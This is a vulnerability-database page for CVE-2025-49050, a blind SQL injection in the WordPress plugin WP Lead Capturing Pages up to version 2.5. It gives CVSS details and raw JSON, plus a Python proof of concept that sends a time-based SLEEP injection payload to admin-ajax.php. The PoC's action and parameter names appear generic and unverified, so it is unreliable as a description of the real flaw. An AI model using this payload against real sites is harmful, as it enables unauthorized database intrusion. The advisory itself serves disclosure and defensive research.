Security Vulnerability Report
中文
CVE-2025-49050 CVSS 8.5 HIGH

CVE-2025-49050

Published: 2026-01-22 17:15:56
Last Modified: 2026-04-27 20:16:10

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in kamleshyadav WP Lead Capturing Pages wp-lead-capture allows Blind SQL Injection.This issue affects WP Lead Capturing Pages: from n/a through <= 2.5.

CVSS Details

CVSS Score
8.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L

Configurations (Affected Products)

No configuration data available.

WP Lead Capturing Pages <= 2.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-49050 Blind SQL Injection PoC # Target: WordPress wp-lead-capture plugin <= 2.5 # Author: Security Research target = "http://target-site.com" # Replace with actual vulnerable endpoint endpoint = "/wp-admin/admin-ajax.php" # Blind SQL Injection payload example # This payload tests for SQL injection using time-based blind technique payload = "1' AND (SELECT * FROM (SELECT(SLEEP(5)))X)-- -" def test_sqli(): """ Test for SQL injection vulnerability The plugin fails to properly sanitize user input before using it in SQL queries """ params = { 'action': 'wplcp_save_lead', 'lead_data': payload, 'post_id': '1' } try: response = requests.post(target + endpoint, data=params, timeout=10) if response.elapsed.total_seconds() >= 5: print("[+] SQL Injection vulnerability confirmed!") print("[+] Time-based blind injection successful") return True except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": print("CVE-2025-49050 WP Lead Capturing Pages SQL Injection Test") test_sqli()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-49050", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:15:55.777", "lastModified": "2026-04-27T20:16:10.300", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in kamleshyadav WP Lead Capturing Pages wp-lead-capture allows Blind SQL Injection.This issue affects WP Lead Capturing Pages: from n/a through <= 2.5."}, {"lang": "es", "value": "Neutralización Incorrecta de Elementos Especiales utilizados en un Comando SQL ('inyección SQL') vulnerabilidad en kamleshyadav WP Lead Capturing Pages wp-lead-capture permite Inyección SQL a Ciegas. Este problema afecta a WP Lead Capturing Pages: desde n/a hasta &lt;= 2.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wp-lead-capture/vulnerability/wordpress-wp-lead-capturing-pages-plugin-2-5-sql-injection-vulnerability-2?_s_id=cve", "source": "[email protected]"}]}}